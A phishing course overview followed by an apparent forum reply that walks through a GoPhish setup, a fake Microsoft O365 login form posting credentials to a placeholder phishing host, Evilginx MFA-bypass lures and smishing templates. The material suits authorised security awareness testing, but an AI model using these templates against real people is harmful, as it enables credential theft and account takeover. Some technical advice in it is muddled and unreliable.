Overview

This specialized and comprehensive course is designed to provide an in-depth understanding of cybersecurity practices, with a focus on ethical hacking techniques to safeguard digital infrastructure. Through a series of detailed modules, participants will delve into modern security architectures, learn how to set up and manage phishing simulations using tools like GoPhish, bypass multi-factor authentication with Evilginx, and explore advanced phishing and vishing strategies. The curriculum also covers essential setup procedures for domain and email registration, configurations for AWS EC2 instances, and the use of SMS phishing (smishing) for security testing. Furthermore, the course emphasizes the importance of reporting, documentation, and ethical considerations in cybersecurity operations.

Re: TCM Security - Practical Phishing Campaigns

First off—that’s a damn good teaser image. The GoPhish dashboard with those custom landing pages? Chef’s kiss. But let’s cut the fluff and get into the real meat of this.

1. The Setup (Because You Can’t Phish Without It)
You’re gonna need:
 • A domain – Not some cheap .tk garbage. Register something plausible (e.g., secure-login-portal.co). Use Namecheap or Cloudflare Registrar—cheap, private WHOIS, and they won’t ask questions.
 • AWS EC2 (or DigitalOcean) – Spin up an Ubuntu instance. No Windows. No excuses. Follow the TCM Security AWS Guide (linked in the course docs) for hardening. Firewall rules: Only allow SSH (port 22) from your IP, and never expose anything else to the public internet.
 • GoPhish – The king of phishing frameworks. Clone it, configure it, and don’t use the default database. PostgreSQL, encrypted, and backed up. Example config snippet below:

YAML:
# gofish/config/config.yaml
server:
listen: "0.0.0.0:3333"
protocol: "https"
certificate: "/etc/ssl/certs/phish-cert.pem"
key: "/etc/ssl/private/phish-key.pem"
database:
driver: "postgres"
open: "user=gofish dbname=phish pass=YOUR_STRONG_PASSWORD sslmode=require"

2. The Phish (Where the Magic Happens)
a. Email Templates
 • Subject lines that trigger urgency: Urgent: Your Account Has Been Locked, Action Required: Password Expiry in 24 Hours.
 • HTML that looks exactly like the real thing. Use HTML Purifier to strip malicious tags, then re-add them manually. Example:

HTML:
<!-- Fake Microsoft O365 login page -->
<div style="background-color: #f4f4f4; padding: 20px; font-family: Arial, sans-serif;">
<h1 style="color: #0078d4;">Microsoft</h1>
<form action="https://your-phish-domain.com/hook" method="POST">
<input type="email" name="username" placeholder="Email address" required style="width: 100%; padding: 10px; margin-bottom: 10px;">
<input type="password" name="password" placeholder="Password" required style="width: 100%; padding: 10px; margin-bottom: 10px;">
<button type="submit" style="background-color: #0078d4; color: white; padding: 10px 20px; width: 100%;">Sign in</button>
</form>
<p style="font-size: 12px; color: #666;">© Microsoft 2024</p>
</div>

b. Evilginx for MFA Bypass
 • Why? Because everyone uses MFA now. Evilginx proxies the login flow, captures the MFA code, and then lets the user in—unaware.
 • Setup: Follow the Evilginx GitHub, but don’t use the default config. Customize the lure page to match the target’s OTP provider (Google Authenticator, Duo, etc.).
 • **Example lures:
- Google Authenticator: Verify Your Identity
- Duo Security: Second Factor Required

3. Smishing (Because Why Not Go Full Circle?)
 • Twilio API for SMS. No cheap SMS gateways—they get blocked.
 • Template:
From: Bank Alert
Your account was accessed from a new device. Reply YES to verify or NO to block.
 • Hook: Use a Google Form or a custom PHP script to log replies. No direct links—social engineering is about trust.

4. Reporting & Documentation (Because You’re Not a Script Kiddie)
 • **Track everything:
- Who clicked?
- Who entered credentials?
- Who bypassed MFA?
 • **Format: JSON reports, automated via GoPhish’s API. Example:

JSON:
{
"campaign": "O365_Phish_2024",
"target": "john.doe@company.com",
"status": "credentials_captured",
"timestamp": "2024-02-20T14:30:45Z",
"mfa_bypassed": true,
"otp_provider": "google_authenticator"
}

5. Ethical Considerations (Because You Will Get Caught)
 • Get written permission. Always.
 • Use test domains. No live credentials.
 • Clean up after. Delete logs, revoke API keys, and pray you didn’t leave a backdoor.

Final Thought:
This isn’t just about clicking send. It’s about psychology, timing, and execution. The best phishes aren’t the ones that look real—they’re the ones that feel real.

Now go build something that hurts—ethically.
